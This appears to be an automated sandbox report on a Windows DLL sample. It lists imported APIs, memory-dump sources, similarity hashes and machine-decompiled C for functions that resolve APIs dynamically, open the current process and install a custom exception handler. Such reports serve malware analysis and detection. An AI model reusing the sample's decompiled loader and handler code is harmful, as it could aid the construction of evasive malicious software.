0x6e1716e7
0x6e1716ec
0x6e1716ef
0x6e1716f4
0x6e1716f8
0x6e1716fd
0x6e171702
0x6e171706
0x6e17170b
0x6e17170c
0x6e171710
0x6e171715
0x6e17171d
0x6e17171d
0x6e171715
0x6e171706
0x6e1716f8
0x6e17171f
0x6e171728
0x6e17172c
0x6e171736
0x6e17173c
0x6e17173c

APIs

Part of subcall function 6E17150D: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E1716D5,?,?,?,?,?,00000002,?,6E1714D0), ref: 6E171531
Part of subcall function 6E17150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E171553
Part of subcall function 6E17150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E171569
Part of subcall function 6E17150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E17157F
Part of subcall function 6E17150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E171595
Part of subcall function 6E17150D: GetProcAddress.KERNEL32(00000000,?), ref: 6E1715AB

Part of subcall function 6E171000: memcpy.NTDLL(?,?,?), ref: 6E171037
Part of subcall function 6E171000: memcpy.NTDLL(?,?,?), ref: 6E17106C

Part of subcall function 6E1717FA: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E171832

Part of subcall function 6E171E32: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E171E6B
Part of subcall function 6E171E32: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E171EE0
Part of subcall function 6E171E32: GetLastError.KERNEL32 ref: 6E171EE6

GetLastError.KERNEL32(?,6E1714D0), ref: 6E171717

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: e8f62ca942923727f65438ccfbc82f72f9e48227b001da5122fa07a373b09ca3
Instruction ID: 1f14d8fbfba76414f0620be9f55a1238db17958b3839f005b0970e3ee30819de
Opcode Fuzzy Hash: e8f62ca942923727f65438ccfbc82f72f9e48227b001da5122fa07a373b09ca3
Instruction Fuzzy Hash: 78112E767007116BCF31DAE98C90DDF77BDAF84A147144414EA0297545D7B0ED4EA7A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1A11D0, Relevance: 61.8, APIs: 41, Instructions: 290libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(6E21A358), ref: 6E1A11D9
GetProcAddress.KERNEL32(?,6E21A374), ref: 6E1A11EB
GetProcAddress.KERNEL32(?,6E21A380), ref: 6E1A1208
GetProcAddress.KERNEL32(?,6E21A388), ref: 6E1A1225
GetProcAddress.KERNEL32(?,6E21A394), ref: 6E1A1241
GetProcAddress.KERNEL32(?,6E21A3A0), ref: 6E1A125E
GetProcAddress.KERNEL32(?,6E21A3BC), ref: 6E1A127B
GetProcAddress.KERNEL32(?,6E21A3D0), ref: 6E1A1298
GetProcAddress.KERNEL32(?,6E21A3E0), ref: 6E1A12B5
GetProcAddress.KERNEL32(?,6E21A3F4), ref: 6E1A12D2
GetProcAddress.KERNEL32(?,6E21A408), ref: 6E1A12EF
GetProcAddress.KERNEL32(?,6E21A420), ref: 6E1A130C
GetProcAddress.KERNEL32(?,6E21A434), ref: 6E1A1329
GetProcAddress.KERNEL32(?,6E21A454), ref: 6E1A1346
GetProcAddress.KERNEL32(?,6E21A46C), ref: 6E1A1363
GetProcAddress.KERNEL32(?,6E21A484), ref: 6E1A1380
GetProcAddress.KERNEL32(?,6E21A498), ref: 6E1A139D
GetProcAddress.KERNEL32(?,6E21A4AC), ref: 6E1A13BA
GetProcAddress.KERNEL32(?,6E21A4C8), ref: 6E1A13D7
GetProcAddress.KERNEL32(?,6E21A4E8), ref: 6E1A13F4
GetProcAddress.KERNEL32(?,6E21A504), ref: 6E1A1411
GetProcAddress.KERNEL32(?,6E21A518), ref: 6E1A142E
GetProcAddress.KERNEL32(?,6E21A52C), ref: 6E1A144B
GetProcAddress.KERNEL32(?,6E21A53C), ref: 6E1A1468
GetProcAddress.KERNEL32(?,6E21A55C), ref: 6E1A1485
GetProcAddress.KERNEL32(?,6E21A578), ref: 6E1A14A2
GetProcAddress.KERNEL32(?,6E21A598), ref: 6E1A14BF
GetProcAddress.KERNEL32(?,6E21A5B4), ref: 6E1A14DC
GetProcAddress.KERNEL32(?,6E21A5CC), ref: 6E1A14F9
GetProcAddress.KERNEL32(?,6E21A5E8), ref: 6E1A1516
GetProcAddress.KERNEL32(?,6E21A604), ref: 6E1A1533
GetProcAddress.KERNEL32(?,6E21A618), ref: 6E1A1550
GetProcAddress.KERNEL32(?,6E21A630), ref: 6E1A156D
GetProcAddress.KERNEL32(?,6E21A64C), ref: 6E1A158A
GetProcAddress.KERNEL32(?,6E21A664), ref: 6E1A15A7
GetProcAddress.KERNEL32(?,6E21A680), ref: 6E1A15C4
GetProcAddress.KERNEL32(?,6E21A698), ref: 6E1A15E1
GetProcAddress.KERNEL32(?,6E21A6B0), ref: 6E1A15FE
GetProcAddress.KERNEL32(?,6E21A6C4), ref: 6E1A161B
GetProcAddress.KERNEL32(?,6E21A6D4), ref: 6E1A1638
GetProcAddress.KERNEL32(?,6E21A6E4), ref: 6E1A1655

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: AddressProc$HandleModule
String ID:
API String ID: 667068680-0
Opcode ID: 26ba28e3d9976b33afcdb058d7dd0df0ca1fff47e505ed31028f7679554abc5a
Instruction ID: 4f10a0a289a7c8f894eed0b7ae4d07eb4a0babd6459d9023e7f0bef3c579d11d
Opcode Fuzzy Hash: 26ba28e3d9976b33afcdb058d7dd0df0ca1fff47e505ed31028f7679554abc5a
Instruction Fuzzy Hash: 15C14EB5A00104EFEB289BA4C69CA6CBAB7FB45301F504569AB62DF385DF744F44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E0480, Relevance: 58.4, APIs: 32, Strings: 1, Instructions: 600COMMON

Download Yara Rule

APIs

__invoke_watson_if_error.LIBCMTD ref: 6E1E0597
OutputDebugStringW.KERNEL32(6E22B518), ref: 6E1E05A4
OutputDebugStringW.KERNEL32(6E22B564), ref: 6E1E05CC
OutputDebugStringW.KERNEL32(6E22B584), ref: 6E1E05D7
OutputDebugStringW.KERNEL32(?), ref: 6E1E05E4
OutputDebugStringW.KERNEL32(6E22B594), ref: 6E1E05EF
__aligned_msize.LIBCMTD ref: 6E1E06E2
__invoke_watson_if_error.LIBCMTD ref: 6E1E06EB
__aligned_msize.LIBCMTD ref: 6E1E073E
__invoke_watson_if_error.LIBCMTD ref: 6E1E0747
__aligned_msize.LIBCMTD ref: 6E1E0778
__invoke_watson_if_error.LIBCMTD ref: 6E1E0781
__aligned_msize.LIBCMTD ref: 6E1E07C5
__invoke_watson_if_error.LIBCMTD ref: 6E1E07CE
__aligned_msize.LIBCMTD ref: 6E1E07FD
__invoke_watson_if_error.LIBCMTD ref: 6E1E0806
__aligned_msize.LIBCMTD ref: 6E1E08DD
__invoke_watson_if_error.LIBCMTD ref: 6E1E08E6
__aligned_msize.LIBCMTD ref: 6E1E0919
__invoke_watson_if_error.LIBCMTD ref: 6E1E0922
__cftoe.LIBCMTD ref: 6E1E095B
__aligned_msize.LIBCMTD ref: 6E1E09A2
__invoke_watson_if_error.LIBCMTD ref: 6E1E09AB

Strings

P, xrefs: 6E1E0C72

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: __invoke_watson_if_error$__aligned_msize$DebugOutputString$__cftoe
String ID: P
API String ID: 1550706228-3110715001
Opcode ID: a8c2b4f1ae2a86111d944f4349fae5890c8058199d86c4b255239be4633fe167
Instruction ID: b0fe71f92df04359b35477d36951d5eee7c8863c05978bd3e68de4cfa38854d2
Opcode Fuzzy Hash: a8c2b4f1ae2a86111d944f4349fae5890c8058199d86c4b255239be4633fe167
Instruction Fuzzy Hash: 91328170D40A18AFEB60CF90CC59BDE7379BB15305F108598F5496A284EF749AC8DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E171CDD, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E171CDD() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6e174130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e17413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6e17412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6e174128 = _t5;
						 *0x6e174130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6e174124 = _t6;
						if(_t6 == 0) {
							 *0x6e174124 =  *0x6e174124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6e171cde
0x6e171cec
0x6e171cf2
0x6e171cf9
0x6e171d50
0x6e171d50
0x6e171cfb
0x6e171d03
0x6e171d10
0x6e171d10
0x6e171d4c
0x6e171d4e
0x00000000
0x00000000
0x00000000
0x6e171d05
0x6e171d0c
0x6e171d12
0x6e171d12
0x6e171d17
0x6e171d25
0x6e171d2a
0x6e171d30
0x6e171d36
0x6e171d3d
0x6e171d3f
0x6e171d3f
0x6e171d49
0x6e171d0e
0x6e171d0e
0x00000000
0x6e171d0e
0x6e171d0c

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E171243,747863F0), ref: 6E171CEC
GetVersion.KERNEL32 ref: 6E171CFB
GetCurrentProcessId.KERNEL32 ref: 6E171D17
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E171D30

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 2503f9289d8cfd25e4beee0114b7073b2338e24c9918a79276e238a6d4c37aeb
Instruction ID: 0505055a8abec75e59c40bda4d3026ad905fd629953274894be3c6d04aabb910
Opcode Fuzzy Hash: 2503f9289d8cfd25e4beee0114b7073b2338e24c9918a79276e238a6d4c37aeb
Instruction Fuzzy Hash: 32F03171794B31DBDF516BA8A82D7893BA0A717F12F208115E981C61C4D7609087BF58

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E5AB0, Relevance: 4.7, APIs: 3, Instructions: 223filetimeCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32(00000000,00000000,?), ref: 6E1E5BC1
std::_Timevec::_Timevec.LIBCPMTD ref: 6E1E5BCE
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 6E1E5D63

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: FileFind$FirstNextTimevecTimevec::_std::_
String ID:
API String ID: 2141543823-0
Opcode ID: e293dd809383c1e2543757142c3b17326a5f2f6a0812e7d6dfa8a89a7a3cbea3
Instruction ID: 4cff8cd6e0508173537b28e3b2adac865df79864ae827ebb89effc56bc8d2492
Opcode Fuzzy Hash: e293dd809383c1e2543757142c3b17326a5f2f6a0812e7d6dfa8a89a7a3cbea3
Instruction Fuzzy Hash: 03A17D709146298BCB64DFA4CCA8BEEB779AF91304F5045D8E5096B690DF309EC4DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B4F60, Relevance: 4.6, APIs: 3, Instructions: 81COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6E1B5060
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E1B506E
UnhandledExceptionFilter.KERNEL32(?), ref: 6E1B507B

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ff71effa6783115486bde57be812d84c4ada730a6b71d689cbb26a9cb30f4f17
Instruction ID: 07f2bb2eb67e5e78c06a5700e591ae747c09f3ab545ce4d553fd0bb010c15825
Opcode Fuzzy Hash: ff71effa6783115486bde57be812d84c4ada730a6b71d689cbb26a9cb30f4f17
Instruction Fuzzy Hash: 3A41F5B8C112289BCB25DF64D8887DDBBB8AF18314F1082D9E91D66290E7705B85CF85

Uniqueness

Uniqueness Score: -1.00%

Function 6E1723A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1723A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6e174178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6e1741c0 = 1;
										__eflags =  *0x6e1741c0;
										if( *0x6e1741c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6e174178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6e1741c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6e174178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6e174180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6e17417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6e174180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e174180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6e1741c0 = 1;
							__eflags =  *0x6e1741c0;
							if( *0x6e1741c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6e174180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6e174180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6e1741c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6e174180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6e174178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6e174180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6e174180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6e1723af
0x6e1723b2
0x6e1723b8
0x6e1723d6
0x00000000
0x6e1723d6
0x6e1723c0
0x6e1723c9
0x6e1723cf
0x6e1723de
0x6e1723e1
0x6e1723e4
0x6e1723ee
0x6e1723ee
0x6e1723f0
0x6e1723f3
0x6e1723f5
0x6e1723f5
0x6e1723f7
0x6e1723fa
0x00000000
0x00000000
0x6e1723fc
0x6e1723fe
0x6e172464
0x6e172464
0x6e1725c2
0x00000000
0x6e1725c2
0x6e172400
0x6e172400
0x6e172404
0x6e172406
0x6e172406
0x6e172406
0x6e172406
0x6e172409
0x6e17240a
0x6e17240d
0x6e17240d
0x6e172411
0x6e172415
0x6e172423
0x6e172423
0x6e17242b
0x6e172431
0x6e172433
0x6e172435
0x6e172445
0x6e172452
0x6e172456
0x6e17245b
0x6e17245d
0x6e1724db
0x6e1724db
0x6e17245f
0x6e17245f
0x6e17245f
0x6e1724dd
0x6e1724df
0x6e1725c0
0x6e1725c0
0x00000000
0x6e1724e5
0x6e1724e5
0x6e1724ec
0x00000000
0x00000000
0x6e1724f2
0x6e1724f6
0x6e172552
0x6e172554
0x6e17255c
0x6e17255e
0x6e172560
0x00000000
0x00000000
0x6e172562
0x6e172568
0x6e17256a
0x6e17256c
0x6e172581
0x6e172581
0x6e172583
0x6e1725b2
0x6e1725b9
0x00000000
0x6e1725b9
0x6e172587
0x6e172588
0x6e17258a
0x6e17258c
0x6e17258c
0x6e17258e
0x6e172590
0x6e172592
0x6e1725a6
0x6e1725a6
0x6e1725a9
0x6e1725ab
0x6e1725ab
0x6e1725ac
0x6e1725ac
0x00000000
0x6e172594
0x6e172594
0x6e172594
0x6e17259d
0x6e17259e
0x6e1725a0
0x6e1725a2
0x6e1725a2
0x00000000
0x6e172594
0x6e172592
0x6e17256e
0x6e172575
0x6e172575
0x6e172577
0x00000000
0x00000000
0x6e172579
0x6e17257a
0x6e17257d
0x6e17257f
0x00000000
0x00000000
0x00000000
0x6e17257f
0x00000000
0x6e172575
0x6e1724f8
0x6e1724fb
0x6e172500
0x00000000
0x00000000
0x6e172509
0x6e17250b
0x6e172511
0x00000000
0x00000000
0x6e172517
0x6e17251d
0x00000000
0x00000000
0x6e172523
0x6e172525
0x6e17252e
0x6e172532
0x00000000
0x00000000
0x6e172538
0x6e17253b
0x6e17253d
0x00000000
0x00000000
0x6e172544
0x6e172546
0x00000000
0x00000000
0x6e172548
0x6e17254c
0x00000000
0x00000000
0x00000000
0x6e17254c
0x00000000
0x00000000
0x00000000
0x6e172437
0x6e172437
0x6e172437
0x6e17243e
0x00000000
0x00000000
0x6e172440
0x6e172441
0x6e172443
0x00000000
0x00000000
0x00000000
0x6e172443
0x6e17246b
0x6e17246d
0x00000000
0x00000000
0x6e17247d
0x6e17247f
0x6e172481
0x00000000
0x00000000
0x6e172487
0x6e17248e
0x6e1724ba
0x6e1724ba
0x6e1724bc
0x6e1724be
0x6e1724d2
0x6e1724d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1724c0
0x6e1724c0
0x6e1724c0
0x6e1724c9
0x6e1724ca
0x6e1724cc
0x6e1724ce
0x6e1724ce
0x00000000
0x6e1724c0
0x6e172490
0x6e172493
0x6e172495
0x6e1724a7
0x6e1724a7
0x6e1724aa
0x6e1724ac
0x6e1724ac
0x6e1724ad
0x6e1724ad
0x6e1724b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6e172497
0x6e172497
0x6e172497
0x6e17249e
0x00000000
0x00000000
0x6e1724a0
0x6e1724a0
0x6e1724a1
0x00000000
0x00000000
0x00000000
0x6e1724a1
0x6e1724a3
0x6e1724a5
0x6e1724b8
0x00000000
0x00000000
0x00000000
0x6e1724b8
0x00000000
0x6e1724a5
0x6e172417
0x6e17241a
0x6e17241d
0x00000000
0x00000000
0x6e17241f
0x6e172421
0x00000000
0x00000000
0x00000000
0x6e172421
0x6e1723e6
0x6e1723e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E172456

Memory Dump Source

Source File: 00000001.00000002.726962675.000000006E171000.00000020.00020000.sdmp, Offset: 6E170000, based on PE: true

Associated: 00000001.00000002.726942511.000000006E170000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727063662.000000006E173000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.727101198.000000006E175000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.727134726.000000006E176000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 86087783eb85c8bf5e68ee12104d2a27808b1024dd1e252ab342432d26f5ed00
Instruction ID: 1e48eb3d54ff4827356123a302721056159c5d72058681017ce48d73c97ba4b9
Opcode Fuzzy Hash: 86087783eb85c8bf5e68ee12104d2a27808b1024dd1e252ab342432d26f5ed00
Instruction Fuzzy Hash: B961BFF0624616DFEF79CBA9C8A069937B5EB66B14B308529D816C7284F330D8C3E750

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A38F0, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(6E1A3900), ref: 6E1A38F8

Memory Dump Source

Source File: 00000001.00000002.727248235.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3db0a8bba602625809d81933b34e61922ba485b9d05124c84ed2f3e8381167a5
Instruction ID: d511c91109b896610491c1f0afed664730a10c073e5adc997ceb43c02479f648
Opcode Fuzzy Hash: 3db0a8bba602625809d81933b34e61922ba485b9d05124c84ed2f3e8381167a5
Instruction Fuzzy Hash: 50A0223000820CE3083022EAA80CAAAFF0EC00B2323000000F20F003020AA2200080B2

Uniqueness

Uniqueness Score: -1.00%

Function 6E172184, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6E172184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6E1722EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6E1723A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6E172290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6E1722EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6E172387(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6e172188
0x6e172189
0x6e17218a
0x6e17218d
0x6e17218f
0x6e172192
0x6e172193
0x6e172195
0x6e172196
0x6e172197
0x6e17219a
0x6e1721a4
0x6e172255
0x6e17225c
0x6e172265
0x6e1721aa
0x6e1721aa
0x6e1721b0
0x6e1721b6
0x6e1721b9
0x6e1721bc
0x6e1721c0
0x6e1721c5
0x6e1721ca
0x6e17224a
0x00000000
0x6e1721cc
0x6e1721cc
0x6e1721d8
0x6e1721da
0x6e172235
0x6e172235
0x6e17223b
0x00000000
0x6e1721dc
0x6e1721eb
0x6e1721ed
0x6e1721ee
0x6e1721ef
0x6e1721f2
0x6e1721f2
0x6e1721f4
0x00000000
0x6e1721f6
0x6e1721f6
0x6e172240
0x6e1721f8
0x6e1721f8
0x6e1721fc
0x6e172204
0x6e172209
0x6e17220e
0x6e17221a
0x6e172222
0x6e172229
0x6e17222f
0x6e172233
0x00000000
0x6e172233
0x6e1721f6
